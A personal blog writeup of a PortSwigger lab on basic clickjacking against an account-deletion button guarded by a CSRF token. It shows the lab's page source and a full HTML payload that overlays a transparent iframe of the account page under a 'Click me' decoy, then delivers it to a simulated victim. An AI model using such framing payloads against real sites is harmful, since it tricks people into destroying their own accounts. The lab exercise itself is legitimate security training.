siunam's Website

My personal website

Home Writeups Blog Projects About E-Portfolio

Basic clickjacking with CSRF token protection | Jan 2, 2022

Introduction

Welcome to my another writeup! In this Portswigger Labs lab, you’ll learn: Basic clickjacking with CSRF token protection! Without further ado, let’s dive in.

Background

This lab contains login functionality and a delete account button that is protected by a CSRF token. A user will click on elements that display the word “click” on a decoy website.

To solve the lab, craft some HTML that frames the account page and fools the user into deleting their account. The lab is solved when the account is deleted.

You can log in to your own account using the following credentials: wiener:peter

Exploitation

Login as user wiener:

In here, we can update our email and delete account.

View source page:

<div id=account-content>
    <p>Your username is: wiener</p>
    <form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST">
        <label>Email</label>
        <input required type="email" name="email" value="">
        <input required type="hidden" name="csrf" value="9QQV1ykloZOA78c916sgooRLy8SJZEbD">
        <button class='button' type='submit'> Update email </button>
    </form>
    <form id=delete-account-form action="/my-account/delete" method="POST">
        <input required type="hidden" name="csrf" value="9QQV1ykloZOA78c916sgooRLy8SJZEbD">
        <button class="button" type="submit">Delete account</button>
    </form>
</div>

Also, they’re using a CSRF token try to prevent CSRF attack.

Now, let’s build a hidden <iframe> and a clickbait text:

<html>
    <head>
        <title>Basic clickjacking with CSRF token protection</title>
        <style type="text/css">
            #targetWebsite {
                position:relative;
                width:700px;
                height:700px;
                opacity:0.0001;
                z-index:2;
            }

            #decoyWebsite {
                position:absolute;
                top:495px;
                left:60px;
                z-index:1;
            }
        </style>
    </head>
    <body>
        <div id="decoyWebsite">Click me</div>
        <iframe id="targetWebsite" src="https://0a2f006904c03654c0f5634d009f00aa.web-security-academy.net/my-account"></iframe>
    </body>
</html>

Then, host it on the exploit server, and deliver to victim:

We did it!

What we’ve learned:

  1. Basic clickjacking with CSRF token protection